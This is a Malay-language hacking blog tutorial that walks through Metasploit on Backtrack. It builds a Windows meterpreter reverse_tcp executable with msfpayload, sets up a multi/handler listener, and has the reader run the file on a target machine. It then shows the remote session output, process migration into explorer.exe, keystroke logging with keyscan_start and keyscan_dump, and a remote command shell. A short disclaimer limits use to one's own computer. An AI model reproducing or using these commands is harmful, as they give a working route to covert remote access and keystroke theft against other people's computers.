Tutorial Metasploit Menggunakan Backtrack
AMP Ads
Mobile Ads
Home Pilihan OMG Artikel Tutorial Metasploit Menggunakan Backtrack

Tutorial Metasploit Menggunakan Backtrack

0
Mobile Ads

Assalamu’alaikum Dan Selamat Sejahtera Para Pembaca OMG! Hackers?

Metasploit adalah sumber terbuka rangka kerja(framework) untuk ujian penetrasi. Ianya digunakan untuk mengembangkan dan melaksanakan serangan terhadap sistem sasaran. Ia juga mempunyai pangkalan data yang besar dan boleh juga digunakan utnuk menulis eksploitasi zero-day kita sendiri.

Di bawah ini saya senaraikan basic-basic term yang perlu anda tahu:

  • Vulnerability: Kecacatan atau kelemahan dalam prosedur sekuriti sistem, reka bentuk atau pelaksanaan yang boleh dieksploitasikan sehingga menyebabkan kerosakkan.
  • Exploit: Sejenis perisian yang mengambil kesempatan terhadap bug atau vulnerability, yang boleh membawa kepada privilege escalation atau serangan DOS terhadap sasaran.
  • Overflow: Ralat yang disebabkan apabila sesuatu program itu cuba untuk menyimpan data di luar saiznya. Mungkin ianya digunakan untuk membolehkan penyerang untuk melaksanakan malicious code.
  • Payload: Kod sebenar yang dijalankan pada sistem yang dikompromi selepas eksploitasi.

Metasploit muncul dengan versi-versi berikut:

  • CLI (Command Line Interface)
  • Web Interface
  • MSF Console
  • MSFwx
  • MSFAPI

Untuk tutorial hari ini saya menggunakan MSF console kerana ianya mudah dan efektif. Jadi apa yang anda perlukan adalah Backtrack dan 2 komputer, iaitu satu tu untuk komputer anda dan satu lagi komputer sasaran. Ingat! Anda lakukan ini di network anda sendiri. Okay. Are you ready? Lets GO!

Mula-mula sekali buka backtrack anda itu. Kalau tak tahu nak pasang anda boleh godek-godek blog ni untuk cari cara pemasangannya. Apa yang penting sekali anda perlu tahu Local IP anda. Anda buka terminal dan taipkan

root@bt:~#ifconfig

Kemudian anda akan jumpa IP anda seperti 192.168.x.x atau 10.x.x.x

Pastikan anda ingat IP anda itu.

Langkah seterusnya anda pergi ke Applications >> Backtrack >> Exploitation Tools >> Network Exploitation Tools >> Metasploit Framework >> msfconsole

Anda pasti akan mendapat shell yang sama seperti command prompt di dalam Windows.

Selepas itu anda membuka terminal dan taipkan perintah ini. Tujuannya untuk mencipta satu fail pelaksanaan yang membolehkan menghubungkan komputer kita dan komputer sasaran dengan menggunakan meterprete payload.

root@bt:~# cd /opt/framework3/msf3

root@bt:/opt/framework3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=”Local IP Anda” LPORT=”Apa-apa sahaja Port” x > /root/Desktop/reverse_tcp.exe

Local IP anda itu adalah IP anda sendiri. Yang saya suruh ingat tadi. Kalau lupa tengok balik kat atas. Dan untuk port anda boleh pilih 4444. (Semua ini ditulis tanpa quotes.)

Anda akan mendapat seperti ini:

Created by msfpayload (http://www.metasploit.com).

Payload: windows/meterpreter/reverse_tcp

Length: 290

Options: LHOST=192.168.255.130,LPORT=4444

root@bt:/opt/framework3/msf3#

Juga di desktop anda akan ada fail reverse_tcp.exe.

Anda salin reverse_tcp.exe itu dan tampalkannya pada komputer sasaran anda yang menggunakan local network yang sama. Kemudian jalankannya.

Kemudian anda buka semula msfconsole yang saya suruh buka tadi itu. Dan taipkan ini

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.255.130

LHOST => 192.168.255.130

msf exploit(handler) > set LPORT 4444

LPORT => 4444

Baiklah semua sudah siap. Anda telah pun membuat fail pelaksanaan yang mana ianya akan balik semula connections itu kepada anda.

Langkah terakhir adalah taipkan “exploit” dan tekan enter.

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.255.130:4444

[*] Starting the payload handler…

[*] Sending stage (749056 bytes) to 192.168.255.1

[*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011

Anda akan melihat meterpreter prompt seperti ni

meterpreter >

Taipkan “ps” untuk mendapatkan senarai proses yang aktif

meterpreter > ps

Kemudian cari perkataan “explorer.exe” dan pindahkannya ke proses. Anda perlu lihat pada nombor di sebelah explorer.exe. Sebagai contoh nombornya adalah 5716. Taipkan “migrate 5716”

meterpreter > migrate 5716

[*] Migrating to 5716…

[*] Migration completed successfully.

Kemudian taipkan perintah ini pula

meterpreter > use priv

Jika anda mahu mulakan aktiviti keylogger, anda boleh taipkan ini

meterpreter > keyscan_start

Jika anda ingin pergi ke komputer sasaran anda itu. Anda boleh taipkan ini

meterpreter > shell

Process 5428 created.

Channel 1 created.

Microsoft Windows [Version 6.1.7600]

Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:Windowssystem32>

Anda boleh buat apa saja bila sudah masuk ke komputer sasaran. Dan jika nak kemabali ke meterpreter, anda taipkan perintah ini

C:Windowssystem32> exit

Jika anda ingin melihat apa yang telah di taip pada komputer sasaran, anda taipkan ini

meterpreter > keyscan_dump

Sudah siap! Itu sahaja tutorial yang dapat saya ajar. Kalau anda ada tersalah langkah, ianya tidak akan menjadi. Saya telah mencubanya dua kali dan ianya memang menjadi. HAHA. Jadi apa tunggu lagi? Godam la komputer anda sendiri. 😛

P.S.: The above information is just for educational purposes only. You should test it against the computer you own. Kalau nak bertanya, jangan la tanya soalan-soalan yang tidak munasabah. Anda perlu buat dahulu, cuba buat sendiri. Jangan sebelum buat, dah tanya macam-macam. Itu tandanya anda MALAS.

Rujukan : Metasploit Tutorial With Example

Sekian.

Mobile Ads

Exit mobile version